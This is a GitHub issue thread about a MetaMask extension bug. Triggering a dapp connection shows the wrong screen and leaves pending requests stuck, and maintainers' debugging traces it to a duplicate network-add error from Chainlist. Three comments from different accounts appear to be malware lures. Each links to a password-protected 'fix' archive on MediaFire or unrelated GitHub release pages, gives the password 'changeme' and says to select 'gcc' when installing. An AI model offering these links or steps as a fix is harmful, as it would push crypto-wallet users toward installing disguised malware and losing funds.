### ISSUE TITLE
[Bug]: Dapp Connect - Triggering a dapp connection displays wrong screen and cannot connect.

### ISSUE THREAD

**Issue by seaona** [MetaMask/metamask-extension#26706]
### Describe the bug

Triggering a dapp connection displays wrong screen and cannot connect.
 The pending requests remain in MM indicator but cannot clear them.
The behaviour happens consistently, if I refresh the dapp and try again. The requests keep adding up in the indicator, but cannot connect nor clear them.
No errors in the console.

### Screenshots/Recordings

![Screenshot from 2024-08-28 12-45-58](https://github.com/user-attachments/assets/48deac41-ea47-46a7-bde2-5ec078a1b95f)

https://github.com/user-attachments/assets/77afd5b9-9412-4350-9268-dbfe0157c662

### Steps to reproduce

1. Go to Chainlist https://chainlist.org/?testnets=true&search=blast
2. Import Blast
3. Accept
4. Switch networks
5. Click Import again
6. See error in the console `inpage.js:1 MetaMask - RPC Error: JsonRpcEngine: Response has no error or result for request:` 
7. Go to a dapp and try to connect https://faucet.quicknode.com/blast/sepolia
8. I saw the above screen

### Detection stage

In beta

### Version

12.1.0

### Build type

None

### Browser

Chrome

### Operating system

Linux

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gauthierpetetin** [comment]
It's weird, I don't manage to reproduce on my side

https://github.com/user-attachments/assets/786efab7-f360-45d2-8329-6e6fb04adea8

**Comment by seaona** [comment]
hey @gauthierpetetin could you try to first import the network above and see if that makes it repro for you?

**Comment by gauthierpetetin** [comment]
Yes I've done this just before the recording but it didn't reproduce the issue as well.

**Comment by seaona** [comment]
mmm I can reproduce this every-time. Maybe due to a previous step I did? I cannot seem to get out of this state now. For now, I won't remove the wallet, in case it helps debugging.


https://github.com/user-attachments/assets/637e07ff-7046-4405-870e-53586291208e

**Comment by gauthierpetetin** [comment]
Yes maybe..
On my side I retried the entire flow from a fresh start, but still not able to reproduce.

https://github.com/user-attachments/assets/26a3b48c-3136-4430-aba2-fb8a70a80f3d

**Comment by seaona** [comment]
After investigating this with @Gudahtt and @adonesky1 we found the following:

- Since this was a prod build, we loaded the source-maps manually one by one (taken from circle ci artifacts) -> in the future we could see if this could be improved and do it all at once
- Once we had source maps, we looked for the `enqueRequest` and we logged the queued requests, that were kept adding after triggering each Connect action
- We triggered again a Connect action from the test dapp, and we saw that the origin was Chainlist. This suggested that something happened in that stage, before start seeing the incorrect screen
- We saw console errors in Chainlist `MetaMask - RPC Error: JsonRpcEngine: Response has no error or result for request:`
- This indicated trying to add the same current network gave that error
- Mark tried triggering this error and after seeing that, triggering a connect action was giving the same screen as above

See the queued requests here:

![Screenshot from 2024-08-28 19-32-20](https://github.com/user-attachments/assets/89075ed3-a483-48f1-81cf-495bb0eac3f7)

See origin Chainlist here:
![Screenshot from 2024-08-28 19-32-34](https://github.com/user-attachments/assets/5a465eae-8fa4-4bfe-b0ad-9114334f7bea)

Chainlist errors

![Screenshot from 2024-08-28 19-37-20](https://github.com/user-attachments/assets/127b6e1c-1a62-4d66-a471-e9029b59a1e6)

**Comment by Gudahtt** [comment]
I was able to reproduce this on v12.0.6 as well

**Comment by du5** [comment]
I was able to reproduce this on v12.0.6 as well

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by cromatikap** [comment]
Hi, I have the same issue on v12.1.0 with chrome. If I restart the browser, it will work as expected for several times then this bug comes again

https://github.com/user-attachments/assets/93c0f3a8-15b4-4f12-9d85-0d7ff01e6d31

**Comment by Gudahtt** [comment]
Thanks for the report @cromatikap! This fix will be included in the next release, v12.1.1.
